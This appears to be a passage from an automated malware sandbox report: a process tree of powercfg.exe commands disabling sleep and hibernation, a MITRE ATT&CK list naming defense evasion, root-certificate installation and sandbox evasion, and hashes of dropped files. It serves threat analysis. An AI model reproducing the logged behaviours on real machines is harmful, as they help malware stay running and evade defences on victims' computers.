C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:592 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3892
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Defense Evasion
Impair Defenses
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA5126fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
8.2MB
MD55675a5779f4de4ba3ce58a309a7c0086
SHA1dee6fc30051586b405ae85bf7d14bf110440184d
SHA256cb4b754377f21d469f0b766ca65c1db7c6e6e84b897292b02b3eba27a9f9f90d
SHA5126a32c56abd4d05ade7a4756e487c255cc3728eaaeac9cc94d609372eb951c54c89f343e87eede51d374b48746ca042ef050bc575d178497ca47abe05090b8465
-
Filesize
2KB
MD52b19df2da3af86adf584efbddd0d31c0
SHA1f1738910789e169213611c033d83bc9577373686
SHA25658868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA5124a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6